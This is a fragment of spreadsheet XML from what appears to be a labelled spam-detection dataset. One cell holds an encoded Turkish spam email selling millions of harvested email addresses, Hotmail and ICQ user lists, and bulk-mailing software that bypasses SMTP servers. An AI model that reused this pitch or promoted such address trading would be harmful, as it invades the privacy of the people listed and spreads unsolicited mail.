        <v>7370</v>
      </c>
      <c r="D5322" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5323">
      <c r="A5323" s="1">
        <v>5321.0</v>
      </c>
      <c r="B5323" s="1" t="s">
        <v>7371</v>
      </c>
      <c r="C5323" s="1" t="s">
        <v>7372</v>
      </c>
      <c r="D5323" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5324" hidden="1">
      <c r="A5324" s="1">
        <v>5322.0</v>
      </c>
      <c r="B5324" s="1" t="s">
        <v>307</v>
      </c>
      <c r="C5324" s="1" t="s">
        <v>7373</v>
      </c>
      <c r="D5324" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5325">
      <c r="A5325" s="1">
        <v>5323.0</v>
      </c>
      <c r="B5325" s="1" t="s">
        <v>7374</v>
      </c>
      <c r="C5325" s="1" t="s">
        <v>7375</v>
      </c>
      <c r="D5325" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5326" hidden="1">
      <c r="A5326" s="1">
        <v>5324.0</v>
      </c>
      <c r="B5326" s="1" t="s">
        <v>7376</v>
      </c>
      <c r="C5326" s="1" t="s">
        <v>7377</v>
      </c>
      <c r="D5326" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5327" hidden="1">
      <c r="A5327" s="1">
        <v>5325.0</v>
      </c>
      <c r="B5327" s="1" t="s">
        <v>1027</v>
      </c>
      <c r="C5327" s="1" t="s">
        <v>4606</v>
      </c>
      <c r="D5327" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5328">
      <c r="A5328" s="1">
        <v>5326.0</v>
      </c>
      <c r="B5328" s="1" t="s">
        <v>7378</v>
      </c>
      <c r="C5328" s="1" t="s">
        <v>7379</v>
      </c>
      <c r="D5328" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5329" hidden="1">
      <c r="A5329" s="1">
        <v>5327.0</v>
      </c>
      <c r="B5329" s="1" t="s">
        <v>5277</v>
      </c>
      <c r="C5329" s="1" t="s">
        <v>7380</v>
      </c>
      <c r="D5329" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5330" hidden="1">
      <c r="A5330" s="1">
        <v>5328.0</v>
      </c>
      <c r="B5330" s="1" t="s">
        <v>6954</v>
      </c>
      <c r="C5330" s="1" t="s">
        <v>6955</v>
      </c>
      <c r="D5330" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5331">
      <c r="A5331" s="1">
        <v>5329.0</v>
      </c>
      <c r="B5331" s="1" t="s">
        <v>5398</v>
      </c>
      <c r="C5331" s="1" t="s">
        <v>7381</v>
      </c>
      <c r="D5331" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5332">
      <c r="A5332" s="1">
        <v>5330.0</v>
      </c>
      <c r="B5332" s="1" t="s">
        <v>7382</v>
      </c>
      <c r="C5332" s="1" t="s">
        <v>7383</v>
      </c>
      <c r="D5332" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5333" hidden="1">
      <c r="A5333" s="1">
        <v>5331.0</v>
      </c>
      <c r="B5333" s="1" t="s">
        <v>533</v>
      </c>
      <c r="C5333" s="1" t="s">
        <v>7264</v>
      </c>
      <c r="D5333" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5334">
      <c r="A5334" s="1">
        <v>5332.0</v>
      </c>
      <c r="B5334" s="1" t="s">
        <v>5778</v>
      </c>
      <c r="C5334" s="1" t="s">
        <v>5779</v>
      </c>
      <c r="D5334" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5335" hidden="1">
      <c r="A5335" s="1">
        <v>5333.0</v>
      </c>
      <c r="B5335" s="1" t="s">
        <v>7384</v>
      </c>
      <c r="C5335" s="1" t="s">
        <v>7385</v>
      </c>
      <c r="D5335" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5336">
      <c r="A5336" s="1">
        <v>5334.0</v>
      </c>
      <c r="B5336" s="1" t="s">
        <v>7386</v>
      </c>
      <c r="C5336" s="3" t="str">
        <f>3Chtml=3E=3Chead=3E=3Cmeta http-equiv=3DContent-Language content=3Dtr=3E=3Cmeta http-equiv=3DContent-Type content=3D=22text=2Fhtml=3B charset=3Dwindows-1254=22=3E=3Ctitle=3ETR Rehber 6=3C=2Ftitle=3E=3C=2Fhead=3E
 =3Cbody background=3D=22http=3A=2F=2Fxyzlm22=2Esitemynet=2Ecom=2Fback1=2Egif=3E=22 topmargin=3D1 leftmargin=3D1 bgcolor=3D=22#CECFFF=22=3E
       =3Cp align=3D=22center=22=3E
       =3Cimg border=3D=222=22 src=3D=22http=3A=2F=2Fxyzlm22=2Esitemynet=2Ecom=2Fbanner1=2Egif=22 align=3D=22center=22 width=3D=22610=22 height=3D=2281=22=3E=3Cdiv align=3D=22center=22=3E
   =3Ccenter=3E
   =3Ctable border=3D1 cellspacing=3D1 style=3D=22border-collapse=3A collapse=22 bordercolor=3D=22#111111=22 width=3D612 id=3DAutoNumber1 height=3D77 bgcolor=3D=22#CECFFF=22 background=3D=22http=3A=2F=2Fxyzlm22=2Esitemynet=2Ecom=2Fback1=2Egif=22=3E=3Ctr=3E
     =3Ctd width=3D606 height=3D16 bgcolor=3D=22#00FFFF=22=3E=3Cp align=3Dcenter=3E=3Cb=3E=3Cfont face=3DArial color=3D=22#FF0000=22=3E =3Cmarquee scrolldelay=3D100 scrollamount=3D9=3EREKLAMLARINIZA SERVET =D6DEMEYiN!!! UCUZ=2C KOLAY VE KALICI REKLAMLARINIZ iCiN BiZi ARAYINIZ=2E=2E=2E=3C=2Fmarquee=3E=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E=3C=2Ftr=3E=3Ctr=3E
       =3Ctd width=3D606 height=3D43 bgcolor=3D=22#00FFFF=22=3E=3Cp align=3Dcenter=3E=3Cfont face=3DTahoma size=3D2 color=3D=22#000000=22=3E
       =3Cbr=3E
     Bu ileti size islerinizi kolaylastirmak=2C satislarinizi arttirmak=2C kisacasi 
   milyonlara sesinizi duyurmak icin g=F6nderilmistir=2E Bu t=FCrden tanitimlarla 
   ilgilenmiyorsaniz bu iletiyi=2C &amp;quot=3Bilgilenecegini d=FCs=FCnd=FCg=FCn=FCz&amp;quot=3B tanidiklariniza 
   g=F6nderiniz=2E Bu iletinin size ve tanidiklariniza kazandiracaklarina 
   inanamayacaksiniz!=2E=3Cbr=3EHerseye ragmen bizden e-mail almak istemiyor ve satisa sundugumuz=3Cbr=3E&amp;nbsp=3Blistelerden cikmak istiyorsaniz 
   bu iletiyi bos olarak cevaplamaniz yeterli olacaktir=2E=3Cbr=3E
   T=FCm =F6nerilerinizi dikkate alip degerlendiriyoruz=2E=2E L=FCtfen olumlu olumsuz 
   elestirileriniz icin web sayfamizdaki iletisim formunu kullaniniz=2E=2E=3Cbr=3E
 &amp;nbsp=3B=3C=2Ffont=3E=3C=2Ftd=3E=3C=2Ftr=3E=3Ctr=3E
       =3Ctd width=3D606 height=3D1 bgcolor=3D=22#000000=22 bordercolorlight=3D=22#00FFFF=22 bordercolordark=3D=22#C0C0C0=22=3E
       =3Cb=3E=3Cfont color=3D=22#96B4D8=22 face=3D=22Verdana=22=3E
       =3Cmarquee scrolldelay=3D=2252=22 scrollamount=3D=225=22=3ETR Rehber 8=2E0 G=FCncellenme Tarihi 10 Temmuz 2002'dir=2E=2E TR Rehber ve World Rehberi aldiginizda bir sonraki g=FCncellemede&amp;nbsp=3B herhangi bir =FCcret =F6demeyeceksiniz=2E=2E Daha =F6nceden alis-veris de bulundugumuz m=FCsterilerimize %50 indirim imkani sunuyoruz=2E=2E=3C=2Fmarquee=3E=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E
       =3C=2Ftr=3E=3Ctr=3E=3Ctd width=3D606 height=3D184 align=3D=22center=22=3E
       &amp;nbsp=3B=3Cdiv align=3D=22center=22=3E
         =3Ccenter=3E
         =3Ctable border=3D=221=22 cellpadding=3D=220=22 cellspacing=3D=220=22 style=3D=22border-collapse=3A collapse=22 bordercolor=3D=22#111111=22 width=3D=2290%=22 id=3D=22AutoNumber4=22 height=3D=2220=22=3E
           =3Ctr=3E
             =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E
       =3Cp align=3D=22center=22=3E=3Cu=3E=3Cfont color=3D=22#0000FF=22 size=3D=224=22=3E=3Cb=3E=2E=3A=3ARehberlerimizin Ortak 
       =D6zellikleri=3A=3A=2E=3C=2Fb=3E=3C=2Ffont=3E=3C=2Fu=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E=3Cfont face=3DVerdana size=3D2=3E
             Detayli kategorili =3B daha fazla bilgi i=E7in web sayfam=FDzi ziyaret 
             ediniz=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E=3Cfont face=3D=22Verdana=22 size=3D=222=22=3E
             ilave programlar =3B mailling i=E7in min=2E d=FCzeyde programlar=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=2210=22 colspan=3D=223=22=3E=3Cfont face=3DVerdana size=3D2=3E
             Kullanimi kolayla=FEt=FDr=FDc=FD t=FCrk=E7e d=F6k=FCman ve video format=FDnda 
             a=E7=FDklamalar=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=229=22 colspan=3D=223=22=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22=3ESanayi Rehberi =3Cu=3E
             =3Cfont color=3D=22#FF0000=22=3E=3Cb=3EHediyeli=2E=2E=3C=2Fb=3E=3C=2Ffont=3E=3C=2Fu=3E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=229=22 colspan=3D=223=22=3E
       =3Cp align=3D=22center=22=3E
   =3Cb=3E 
   =3Cfont face=3DVerdana size=3D=222=22=3E800=2E000 =3C=2Ffont=3E=3C=2Fb=3E 
   =3Cfont face=3DVerdana size=3D=222=22=3EArama Motoruna =3Cb=3E=3Cfont color=3D=22#FF0000=22=3E =3Cu=3E=FCcretsiz=3C=2Fu=3E=3C=2Ffont=3E=3C=2Fb=3E kay=FDt 
   imkan=FD=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E** SINIRSIZ telefon=2C e-mail ve icq ile 
             destek garantisi=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=2226%=22 align=3D=22center=22 height=3D=228=22=3E=3Cb=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3ETR Rehber 8=2E5=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E
             =3Ctd width=3D=2224%=22 align=3D=22center=22 height=3D=228=22=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E400=2E000=2E000 TL=2E=3C=2Ffont=3E=3C=2Ftd=3E
             =3Ctd width=3D=2250%=22 align=3D=22center=22 height=3D=228=22=3E
     =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E6=2E000=2E000 T=FCrk e-mail adresi=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=2226%=22 align=3D=22center=22 height=3D=228=22=3E=3Cb=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3ETR Rehber 7=2E0=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E
             =3Ctd width=3D=2224%=22 align=3D=22center=22 height=3D=228=22=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E350=2E000=2E000 TL=2E=3C=2Ffont=3E=3C=2Ftd=3E
             =3Ctd width=3D=2250%=22 align=3D=22center=22 height=3D=228=22=3E
     =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E4=2E000=2E000 T=FCrk e-mail adresi=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=2226%=22 align=3D=22center=22 height=3D=228=22=3E=3Cb=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3ETR Rehber =D6zel=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E
             =3Ctd width=3D=2224%=22 align=3D=22center=22 height=3D=228=22 bgcolor=3D=22#FFFF00=22=3E
             =3Cb=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3E250=2E000=2E000 TL=2E=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E
             =3Ctd width=3D=2250%=22 align=3D=22center=22 height=3D=228=22=3E
     =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E2=2E000=2E000 Firma bazl=FD e-mail adresi=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=2226%=22 align=3D=22center=22 height=3D=228=22=3E=3Cb=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3EWorld Rehber 2=2E5=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E
             =3Ctd width=3D=2224%=22 align=3D=22center=22 height=3D=228=22=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E350=2E000=2E000 TL=2E=3C=2Ffont=3E=3C=2Ftd=3E
             =3Ctd width=3D=2250%=22 align=3D=22center=22 height=3D=228=22=3E=3Cp style=3D=22margin-left=3A -6=22=3E=3Cfont face=3DVerdana size=3D2=3E
             150=2E000=2E000 yabanci e-mail adresi=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=2226%=22 align=3D=22center=22 height=3D=228=22=3E=3Cb=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3EICQ Rehber =D6zel=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E
             =3Ctd width=3D=2224%=22 align=3D=22center=22 height=3D=228=22=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E150=2E000=2E000 TL=2E=3C=2Ffont=3E=3C=2Ftd=3E
             =3Ctd width=3D=2250%=22 align=3D=22center=22 height=3D=228=22=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E2=2E500=2E000 T=FCrk ICQ kullan=FDc=FDsi=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=2226%=22 align=3D=22center=22 height=3D=228=22=3E=3Cb=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22 color=3D=22#FF0000=22=3ESanayi Rehberi=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E
             =3Ctd width=3D=2224%=22 align=3D=22center=22 height=3D=228=22=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22=3E50=2E000=2E000 TL=2E=3C=2Ffont=3E=3C=2Ftd=3E
             =3Ctd width=3D=2250%=22 align=3D=22center=22 height=3D=228=22=3E
             =3Cfont face=3D=22Verdana=22 size=3D=222=22=3ET=FCrkiye deki t=FCm firmalar=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=221=22 colspan=3D=223=22=3E
             =3Cfont face=3D=22Verdana=22 size=3D=221=22=3E&amp;nbsp=3B=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E
             =3Cfont face=3D=22Verdana=22 size=3D=221=22=3E* TR ve WORLD Rehber birlikte 
             aldiginizda Hotmail Kullanici listesini =3Cu=3E=3Cfont color=3D=22#FF0000=22=3E
             =3Cb=3EHEDiYE=3C=2Fb=3E=3C=2Ffont=3E=3C=2Fu=3E ediyoruz=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E
             =3Cfont face=3D=22Verdana=22 size=3D=221=22=3E* Eski m=FCsterilerimize %50 indirimimiz 
             devam etmektedir=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
           =3Ctr=3E
             =3Ctd width=3D=22100%=22 align=3D=22center=22 height=3D=228=22 colspan=3D=223=22=3E
             =3Cfont size=3D=221=22 face=3D=22Verdana=22=3E* Not=3A Fiyatlara KDV ve Kargo =FCcreti 
             dahil edilmemi=FEtir=2E=2E=3C=2Ffont=3E=3C=2Ftd=3E
           =3C=2Ftr=3E
         =3C=2Ftable=3E
         =3C=2Fcenter=3E
       =3C=2Fdiv=3E
 &amp;nbsp=3B=3C=2Ftd=3E
       =3C=2Ftr=3E=3Ctr=3E
       =3Ctd width=3D606 height=3D1 bgcolor=3D=22#00FFFF=22=3E=3Cp align=3Dcenter=3E=3Cb=3E
     =3Cfont face=3DVerdana color=3D=22#FFFFFF=22=3E =3Cspan style=3D=22background-color=3A #FF0000=22=3E
       =3Cfont size=3D=222=22=3ETR 8=2E0 ve World Rehber birlikte sadece 750=2E000=2E000 TL=2EYerine =3C=2Ffont=3E
       600=2E000=2E000 TL=2E=3C=2Fspan=3E=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E=3C=2Ftr=3E=3C=2Ftable=3E=3C=2Fcenter=3E
 =3C=2Fdiv=3E
 =3Cdiv align=3Dcenter=3E=3Ccenter=3E
   =3Ctable border=3D1 cellspacing=3D1 style=3D=22border-collapse=3A collapse=22 bordercolor=3D=22#111111=22 width=3D612 id=3DAutoNumber1 height=3D149 bgcolor=3D=22#CECFFF=22 background=3D=22http=3A=2F=2Fxyzlm22=2Esitemynet=2Ecom=2Fback1=2Egif=22=3E=3Ctr=3E
       =3Ctd width=3D606 height=3D1 bgcolor=3D=22#00FFFF=22=3E
     =3Cp align=3Dleft=3E&amp;nbsp=3B=3Cul style=3D=22margin-top=3A -8=22=3E
       =3Cli style=3D=22line-height=3A 100%=22=3E
       =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E=3Cb=3E =3Cfont face=3DVerdana size=3D1=3EG=FCncelleme islemlerinde 
       ki indirim oran=FDm=FDz %50'dir=2E =3Cbr=3E
 &amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E
       =3Cli=3E
       =3Cp align=3Dleft style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E
       =3Cb=3E =3Cfont face=3DVerdana size=3D2 color=3D=22#FF0000=22=3E
       800=2E000 Arama motoruna kayit islemi 30=2E000=2E000TL + KDV =3Cbr=3E
 &amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E
       =3Cli=3E
       =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E=3Cb=3E=3Cfont face=3DVerdana size=3D1 color=3D=22#000000=22=3ET=FCm 
       versiyonlarimizda g=F6nderim islemi icin gerekli ve en kullanisli programlar 
       bulunmaktadir=2E=3C=2Ffont=3E=3Cfont face=3DVerdana size=3D1=3E Bu programlarin video 
       formatinda aciklamalari da CD'ler icerisinde bulunmaktadir=2E=2E=2E=3Cbr=3E
 &amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E
       =3Cli=3E
       =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E=3Cb=3E=3Cfont face=3D=22Verdana=22 size=3D=221=22=3EBu programlar sizin 
       iletilerinizi kolay bir sekilde g=F6ndermenizi saglarken=2C iletilerinizi 
       alan kisilerin kullandigi serverlarin da yorulmamasini=28karsi tarafta problem 
       yaratilmamasini=29 saglayacaktir=2E=2E=2E=3Cbr=3E
 &amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E
       =3Cli=3E
       =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E
       =3Cb=3E=3Cfont face=3D=22Verdana=22 size=3D=221=22=3EBu programlar ISP yada hosting firmanizin 
       SMTP serverini kullanmaniza gerek kalmadan direkt g=F6nderim yapabilmenizi 
       saglayacaktir=2E isterseniz bir checkbox'i isaretliyerek kullanmak 
       istediginiz SMTP server ile&amp;nbsp=3B fault-tolerance yaparak g=F6nderdiginiz 
       iletilerin %100 yerine ulasmasini saglayabilirsiniz=2E=2E=2E=3Cbr=3E
 &amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E
       =3Cli=3E
       =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E
       =3Cb=3E=3Cfont face=3D=22Verdana=22 size=3D=221=22=3ESMTP server kullanmadan g=F6nderdiginiz 
       mesajlar bilinenin aksine daha basarili g=F6nderim yapacakdir=2E C=FCnk=FC 
       mesajlarin yerine ulasip ulasmadigini g=F6r=FCp m=FCdahele yapmak sizin elinizde 
       olacaktir=2E=2E=2E=3Cbr=3E
 &amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E
       =3Cli=3E
       =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E
       =3Cb=3E=3Cfont face=3D=22Verdana=22 size=3D=221=22=3EAyrica bu programlar HTML formatinda 
       mesaj g=F6nderimini de desteklemektedir=2E Bu destek sayesinde renkli=2C resimli 
       daha g=F6rsel ve dikkat cekici iletiler g=F6nderebilirsiniz=2E=2E=2E=3Cbr=3E
 &amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E
       =3Cli=3E
       =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E=3Cb=3E=3Cfont face=3DVerdana size=3D1=3ECD icerisindeki b=FCy=FCk e-mail 
       listelerini kolayca d=FCzenleyebileceginiz=2C istenmeyen e-mail adreslerini 
       otomatik olarak silebileceginiz ve her t=FCrl=FC kategoriye ayirabileceginiz 
       programlar da =FCcretsiz olarak verilmektedir=2E=2E=2E=3Cbr=3E
 &amp;nbsp=3B=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E
       =3Cli=3E
       =3Cp align=3Djustify style=3D=22margin-right=3A 23=3B margin-top=3A -9=3B margin-bottom=3A 0=22=3E=3Cb=3E=3Cfont face=3D=22Verdana=22 size=3D=221=22=3ETR rehber ve World 
       Rehberi birlikte aldiginizda=2C bir sonraki g=FCncel versiyonlari adresinize 
       =FCcretsiz g=F6nderiyoruz=2E=2E=2E Bunun icin l=FCtfen g=FCncelleme maili aldiginizda 
       bize geri d=F6n=FCn=FCz=2E=2E=3C=2Ffont=3E=3C=2Fb=3E=3C=2Fli=3E
     =3C=2Ful=3E
     =3C=2Ftd=3E=3C=2Ftr=3E=3Ctr=3E=3Ctd width=3D606 height=3D1 bgcolor=3D=22#00FFFF=22=3E
     =3Cp align=3D=22center=22=3E=3Cfont face=3DVerdana=3E=3Cb=3E=2E=3A=3A 
   HEDEF KiTLE TESPiDi =3A=3A=2E=3Cbr=3E=3C=2Fb=3E=3Ci=3E=3Cfont size=3D=222=22=3EHedef kitlenize ulasmanizi sa=F0layaci=F0imiz bu 
     =F6zel y=F6ntem hakkinda mutlaka bilgi isteyiniz=2E=2E=3Cbr=3E
     =3C=2Ffont=3E=3C=2Fi=3E
   =3Cb=3E=2E=3A=3A TARGET MAILLING =3A=3A=2E=3C=2Fb=3E=3C=2Ffont=3E=3C=2Ftd=3E=3C=2Ftr=3E=3C=2Ftable=3E=3C=2Fcenter=3E=3C=2Fdiv=3E=3Cdiv align=3Dcenter=3E=3Ccenter=3E
   =3Ctable border=3D1 cellpadding=3D2 cellspacing=3D1 style=3D=22border-collapse=3A collapse=22 bordercolor=3D=22#111111=22 width=3D612 id=3DAutoNumber3 height=3D131 bgcolor=3D=22#CECFFF=22 background=3D=22http=3A=2F=2Fxyzlm22=2Esitemynet=2Ecom=2Fback1=2Egif=22=3E=3Ctr=3E
     =3Ctd width=3D607 height=3D20 bgcolor=3D=22#00FFFF=22=3E
   =3Cp align=3D=22center=22=3E=3Cu=3E=3Cb=3Eiletisim Bilgileri =3A =28 Pazar haric herg=FCn 09=3A00 ile 19=3A30 arasi=29=3C=2Fb=3E=3C=2Fu=3E=3C=2Ftd=3E=3C=2Ftr=3E=3Ctr=3E
       =3Ctd width=3D607 height=3D52=3E=3Cp align=3Dcenter=3E=3Cfont face=3DVerdana size=3D=224=22=3E
       =3Cspan style=3D=22background-color=3A #FF0000=22=3EGSM=3A+ 90 535 482=2E97=2E19&amp;nbsp=3B G=F6khan 
       ATASOY=3Cbr=3E
       =3Cfont color=3D=22#FFFF00=22=3E
       =3Cmarquee width=3D=22386=22=3ETAKLiTLERiMiZDEN SAKININ=2C GARANTiSi OLMAYAN =FCR=FCNLER=2C HiZMETLER KARiYERiNiZi ZEDELEYEBiLiR=2E=2E=3C=2Fmarquee=3E=3C=2Ffont=3E=3C=2Fspan=3E=3C=2Ffont=3E=3C=2Ftd=3E=3C=2Ftr=3E=3Ctr=3E=3Ctd width=3D607 height=3D109=3E=3Cp align=3Dcenter=3E=3Cb=3E =3Cfont face=3D=22Verdana=2C Arial=2C Helvetica=2C sans-serif=22 color=3D=22#FF0000=22=3E&amp;nbsp=3BG=FCn=FCm=FCz 
   T=FCrkiye'sinde internet 
   araciligiyla yapilan reklamlar hizla artmaktadir=2E T=FCrkiye'de ve d=FCnyada bircok 
   firma bu y=F6ntemlerle kendini tanitmaktadir=2EBu artisin icinde sizin de yeralmaniz 
   kacinilmaz bir gercek olacaktir=2E=3C=2Ffont=3E=3C=2Fb=3E=3C=2Ftd=3E=3C=2Ftr=3E=3Ctr=3E
       =3Ctd width=3D607 height=3D1=3E=3Cp align=3Dcenter=3E=3Cfont face=3DTahoma size=3D2 color=3D=22#000000=22=3EHerseye ragmen bizden e-mail almak istemiyor ve satisa sundugumuz=3Cbr=3E
       &amp;nbsp=3Blistelerden cikmak istiyorsaniz =3C=2Ffont=3E=3Cb=3E
       =3Ca href=3D=22mailto=3Auyeiptal=40gmx=2Enet=22=3Euyeiptal=40gmx=2Enet=3C=2Fa=3E=3C=2Fb=3E=3Cfont face=3D=22Arial=22 color=3D=22#ffffff=22 size=3D=222=22=3E=3Cb=3E&amp;nbsp=3B
       =3C=2Fb=3E=3C=2Ffont=3E=3Cfont face=3DTahoma size=3D2 color=3D=22#000000=22=3Eadresine bo=FE bir mail g=F6ndermeniz yeterli olacakd=FDr=2E=3C=2Ffont=3E=3C=2Ftd=3E=3C=2Ftr=3E=3C=2Ftable=3E=3C=2Fcenter=3E=3C=2Fdiv=3E
 =3C=2Fbody=3E=3C=2Fhtml=3E
 -------------------------------------------------------
 This sf.net email is sponsored by: Jabber - The world's fastest growing 
 real-time communications platform! Don't just IM. Build it in! 
 http://www.jabber.com/osdn/xim
 _______________________________________________
 webmake-talk mailing list
 webmake-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/webmake-talk
</f>
        <v>#ERROR!</v>
      </c>
      <c r="D5336" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5337" hidden="1">
      <c r="A5337" s="1">
        <v>5335.0</v>
      </c>
      <c r="B5337" s="1" t="s">
        <v>7387</v>
      </c>
      <c r="C5337" s="1" t="s">
        <v>7388</v>
      </c>
      <c r="D5337" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5338">
      <c r="A5338" s="1">
        <v>5336.0</v>
      </c>
      <c r="B5338" s="1" t="s">
        <v>7389</v>
      </c>
      <c r="C5338" s="1" t="s">
        <v>7390</v>
      </c>
      <c r="D5338" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5339">
      <c r="A5339" s="1">
        <v>5337.0</v>
      </c>
      <c r="B5339" s="1" t="s">
        <v>7391</v>
      </c>
      <c r="C5339" s="1" t="s">
        <v>7392</v>
      </c>
      <c r="D5339" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5340">
      <c r="A5340" s="1">
        <v>5338.0</v>
      </c>
      <c r="B5340" s="1" t="s">
        <v>7393</v>
      </c>
      <c r="C5340" s="1" t="s">
        <v>7394</v>
      </c>
      <c r="D5340" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="5341" hidden="1">
      <c r="A5341" s="1">
        <v>5339.0</v>
      </c>
      <c r="B5341" s="1" t="s">
        <v>486</v>
      </c>
      <c r="C5341" s="1" t="s">
        <v>2913</v>
      </c>
      <c r="D5341" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="5342">
      <c r="A5342" s="1">
